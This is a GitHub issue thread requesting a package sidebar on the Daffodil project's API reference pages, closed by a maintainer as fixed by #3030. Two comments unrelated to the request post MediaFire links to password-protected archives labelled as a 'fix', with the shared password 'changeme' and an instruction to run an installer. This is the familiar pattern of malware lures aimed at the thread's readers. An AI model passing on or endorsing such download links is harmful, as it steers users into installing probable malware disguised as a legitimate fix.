### ISSUE TITLE
[FEAT] Sidebar in API reference pages

### ISSUE THREAD

**Issue by xelaint** [graycoreio/daffodil#3032]
# :bulb: Feature request

## Feature Name
Sidebar in API reference pages

## The Desired Behavior
Add a sidebar that lists out all the packages, similar to the individual docs/packages pages (w/ links to the package api page)

## Environment

<pre><code>
Daffodil version: X.Y.Z
Angular version: X.Y.Z 

 
For Tooling issues:
- Node version: XX  
- Platform:  

Others:

</code></pre>

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by griest024** [comment]
fixed by #3030
